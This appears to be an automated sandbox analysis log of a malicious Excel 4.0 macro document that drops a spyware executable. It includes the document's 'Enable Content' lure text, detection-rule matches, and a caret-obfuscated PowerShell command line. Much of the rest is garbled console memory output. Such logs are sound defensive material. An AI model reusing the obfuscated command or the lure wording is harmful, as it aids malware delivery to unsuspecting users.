      Source: Screenshot number: 4Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
      Source: Screenshot number: 8Screenshot OCR: document is protected. 20 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work
      Source: Screenshot number: 8Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
      Source: Screenshot number: 12Screenshot OCR: document is protected. 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work for
      Source: Screenshot number: 12Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
      Source: Document image extraction number: 0Screenshot OCR: document is protected. 1. Open the document in Microsoft Office. Previewing online does not work f
      Source: Document image extraction number: 0Screenshot OCR: protected documents. 2. If you downloaded this document from your email, please click "Enable Edit
      Source: Document image extraction number: 0Screenshot OCR: Enable Content" on the yellow bar above.
      Source: Document image extraction number: 1Screenshot OCR: document is protected. 1. Open the document in Microsoft Office. Previewing online does not work f
      Source: Document image extraction number: 1Screenshot OCR: protected documents. 2. If you downloaded this document from your email, please click "Enable Edit
      Source: Document image extraction number: 1Screenshot OCR: Enable Content" on the yellow bar above.
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: ul9kpUwYel.xlsInitial sample: EXEC
      Found obfuscated Excel 4.0 MacroShow sources
      Source: ul9kpUwYel.xlsInitial sample: High usage of CHAR() function: 21
      Powershell drops PE fileShow sources
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\cr.exeJump to dropped file
      Source: C:\Users\user\AppData\Roaming\cr.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Users\user\AppData\Roaming\cr.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00412EFA
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00413396
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00425760
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040B831
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00409D52
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0046415B
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0044217B
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004141D0
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004181FE
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00436208
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0041C2ED
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004242AB
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00442436
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040C498
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043C4AE
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004365E1
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0041A6B3
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040A753
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00442840
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0045CA0D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0044CCD8
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00416D15
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0044CF0A
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043D000
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004310FD
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004350A7
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0044D16F
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0041930E
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004275AA
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040964F
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00417625
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00423778
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00461842
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0041186E
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00441898
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0045D929
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00413A83
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00441C0A
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00419CEB
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00417E68
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00449EC0
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00447EFA
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00441EB4
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00459EB9
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00459FD9
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002880B8
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002CA109
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002BA110
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B814A
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0028314A
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002BD15A
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002CA229
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002AD250
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002BD3BF
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00284420
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002944FB
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0028C53D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002835E6
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027C6E8
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002AC6FE
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00287875
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027989F
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0028A903
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027A9A3
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002939C8
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00281ABE
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027BA81
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B2A90
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002D1A92
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B1AE8
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002CCC5D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00283CD3
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002BCF28
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00289F3B
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00279FA2
      Source: ul9kpUwYel.xlsOLE indicator, VBA macros: true
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 002D76B0 appears 153 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 002BED89 appears 75 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 0027F4FF appears 176 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 002AFA10 appears 81 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 0040F2AF appears 181 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 0043F7C0 appears 82 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 002AFE70 appears 51 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 00467460 appears 172 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 0044EB39 appears 77 times
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: String function: 0043FC20 appears 61 times
      Source: sqlite3.dll.24.drStatic PE information: Number of sections : 18 > 10
      Source: cr.exe.23.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: cr.exe.23.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: ul9kpUwYel.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
      Source: dump.pcap, type: PCAPMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: C:\Users\user\Documents\pd.bat, type: DROPPEDMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: classification engineClassification label: mal100.spyw.expl.evad.winXLS@36/22@17/5
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00437BD1 __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,GetModuleFileNameA,_strlen,_mbstowcs,CreateProcessWithTokenW,CloseHandle,Process32NextW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043433D CoCreateInstance,
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\251F0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\cr.exeMutant created: \Sessions\1\BaseNamedObjects\dfthorbnjuser
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD29.tmpJump to behavior
      Source: ul9kpUwYel.xlsOLE indicator, Workbook stream: true
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).....................#.................F...............F.......A.....`IC........v.....................KJ.......).....l.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................p.j....X|................T.............}..v.....|......0.................`.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v............0...............h.`.....$.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../................p.j......................T.............}..v.... .......0.................`.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.......;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.7.T.............}..v....0....... ...............h.`.....".......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;................p.j......................T.............}..v....h.......0.................`.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).............y=.v....G...............{..j......`...............T.............}..v............0.................).............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G................p.j......................T.............}..v....0.......0.................`.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).............y=.v....S...............{..j......`...............T.............}..v....X.......0.................).....^.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S................p.j......................T.............}..v............0.................`.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).............y=.v...._...............{..j......`...............T.............}..v............0.................).....Z.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._................p.j....h.................T.............}..v............0.................`.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).............y=.v....k...............{..j......`...............T.............}..v............0.................).............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k................p.j....h.................T.............}..v............0.................`.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w....... . . .I.t.e.m.C.o.m.m.a.n.d.......T.............}..v............0...............h.`.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w................p.j....@.................T.............}..v............0.................`.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......{..j......`...............T.............}..v....P.......0...............h.`.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................p.j......................T.............}..v............0.................`.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.................F...............F.......A.....`IC........v.....................KJ.............r.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............[S.j.....r................T.............}..v.....s......0.................i.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v....(w......0...............H.i.....$.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............[S.j.....w................T.............}..v....`x......0.................i.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.9.T.............}..v....p|......0...............H.i.....".......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;...............[S.j....(}................T.............}..v.....}......0.................i.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............;P.j......i...............T.............}..v............0.......................`.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............[S.j......................T.............}..v............0.................i.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............;P.j......i...............T.............}..v....0.......0.......................^.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............[S.j......................T.............}..v....h.......0.................i.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............;P.j......i...............T.............}..v............0.......................`.......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............[S.j....H.................T.............}..v............0.................i.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............;P.j......i...............T.............}..v............0...............................................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............[S.j....H.................T.............}..v............0.................i.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w....... . . .o.c.a.t.i.o.n.C.o.m.m.a.n.d.T.............}..v............0...............H.i.....".......................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w...............[S.j......................T.............}..v............0.................i.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......;P.j......i...............T.............}..v............0...............H.i.............................
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................[S.j....X.................T.............}..v............0.................i.............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................................@{ .....................i^Q.......................$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J....
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................m.o.d.e........./................................$.J............/...............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .1.8.,.1. ..............................\Q.....m.o.d.e..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q.....m.o.d.e..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................................@{ .....................i^Q.......................$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................c.o.l.o.r......./................................$.J............/...............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .F.E. ..................................\Q.....c.o.l.o..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q.....c.o.l.o..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ........................................................................i^Q.......................$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J....
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................s.e.t.l.o.c.a.l./................................$.J............/...............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q.....s.e.t.l..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ...................................................J....................i^Q.....`{.J..............$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................f.o.r...........`{.J.....................\Q.....X%.J.............D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ./.F...........`{.J.....................\Q.....X%.J.............D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .".t.o.k.e.n.s.=.4.-.5. .d.e.l.i.m.s.=... ."...X%.J.............D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .%.i. .i.n. ...=.4.-.5..................\Q.....X%.J.............D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................(.'.v.e.r.'.). .d.o. .5..................\Q.....X%.J.............D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................s.e.t...........d.o. .5..................\Q.....X%.J.............D$.............................x...............
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .V.E.R.S.I.O.N.=.%.i...%.j. ............\Q.....s.e.t............D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: .................................................D$......................\Q.....x................D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................................p.%......................QQ..............i$.....................H................i$.............
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............x.......2..................J....
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................s.e.t............\%.......................$...............%........J....x.......X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .V.E.R.S.I.O.N.=.6...1. ................^Q.....s.e.t....i$.....................(................i$.............
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................................=.6...1..................^Q.....s.e.t....i$.....................(................i$.............
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................................`{.J....................i^Q......$.J..............$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J....
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................i.f. ...........`{.J.....................\Q.....X%.J.............D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................".6...1.". .=.=. .".1.0...0.". ..........\Q.....i.f. ............D$.............X....... .......................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................(................D$..................... .......x...............d1.......".v...............................J....
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q.....(................D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................e.c.h.o.........}..v....................|.......................................................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .".W.i.n.d.o.w.s. .1.0. .d.e.t.e.c.t.e.d.". . .e.c.h.o..........D$.....................0.......................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... ..........D$......................\Q.....x................D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........}..v....................|....................................................... ..... .........
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$.............D........................................................]Q.....r.e.g............D$...............$.............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............1.>......................................]Q......................D$.............8...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................]Q......................D$.............8...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1......................y\Q......................D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............t.i.m.e.o.u.t...}..v....................|...............3.......................8............... ..... .........
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D............... ./.t. .2. . ............................]Q.....t.i.m.e..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............1.>.....................................9]Q..... ./.t. ..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............n.u.l. .................................9]Q..... ./.t. ..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D............... ..... .........d1.......................]Q......................D$.............8...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............s.c.h.t.a.s.k.s.}..v....................|.......D.......^....................................... ..... .........
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$.............D.......................................................i]Q.....s.c.h.t..........D$...............$.....v.......................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............1.>......................................^Q......................D$.............x...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............n.u.l. ..................................^Q......................D$.............x...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1......................9]Q......................D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v....................|.......................................x............... ..... .........
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ./.t. .3. . ............................^Q.....t.i.m.e..........D$.............H...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................^Q..... ./.t. ..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................^Q..... ./.t. ..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1.......................^Q......................D$.............x...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........d1.......................^Q......................D$.............x...............x...............
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$......................................................................^Q.....r.e.g............D$...............$.....T.......................
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q........J.............D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................). ......................................\Q........J.............D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: .................................................D$......................\Q.....x................D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................i.f. ...........`{.J.....................\Q.....X%.J.............D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................".6...1.". .=.=. .".6...3.". ............\Q.....i.f. ............D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................(................D$.............................x...............d1.......".v...............................J....
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q.....(................D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................e.c.h.o.........}..v....................|.......................................................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .".W.i.n.d.o.w.s. .8...1. .d.e.t.e.c.t.e.d.". . .c.h.o..........D$.....................2.......................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... ..........D$......................\Q.....x................D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........}..v....................|....................................................... ..... .........
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$......................................................................]Q.....r.e.g............D$...............$.............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................]Q......................D$.............8...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................]Q......................D$.............8...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1......................y\Q......................D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v....................|...............@.......................8............... ..... .........
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1.......................]Q......................D$.............8...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................s.c.h.t.a.s.k.s.}..v....................|...............f....................................... ..... .........
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$.....................................................................i]Q.....s.c.h.t..........D$...............$.....v.......................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................^Q......................D$.............x...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................^Q......................D$.............x...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1......................9]Q......................D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v....................|.......................................x............... ..... .........
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ./.t. .3. . ............................^Q.....t.i.m.e..........D$.............H...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................^Q..... ./.t. ..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................^Q..... ./.t. ..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1.......................^Q......................D$.............x...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........d1.......................^Q......................D$.............x...............x...............
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$......................................................................^Q.....r.e.g............D$...............$.....T.......................
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q........J.............D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................). ......................................\Q........J.............D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: .................................................D$......................\Q.....x................D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................................`{.J....................i^Q......$.J..............$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................".6...1.". .=.=. .".6...2.". ............\Q.....i.f. ............D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................(................D$.............................x...............d1.......".v...............................J....
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q.....(................D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................e.c.h.o.........}..v....................|.......................................................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .".W.i.n.d.o.w.s. .8. .d.e.t.e.c.t.e.d.". . ...e.c.h.o..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... ..........D$......................\Q.....x................D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........}..v....................|...............$....................................... ..... .........
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$......................................................................]Q.....r.e.g............D$...............$.............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................]Q......................D$.............8...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................]Q......................D$.............8...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v....................|...............F.......................8............... ..... .........
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ./.t. .2. . ............................]Q.....t.i.m.e..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>.....................................9]Q..... ./.t. ..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. .................................9]Q..... ./.t. ..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1.......................]Q......................D$.............8...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................s.c.h.t.a.s.k.s.}..v....................|....................................................... ..... .........
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$.....................................................................i]Q.....s.c.h.t..........D$...............$.....v.......................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................^Q......................D$.............x...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................^Q......................D$.............x...............................
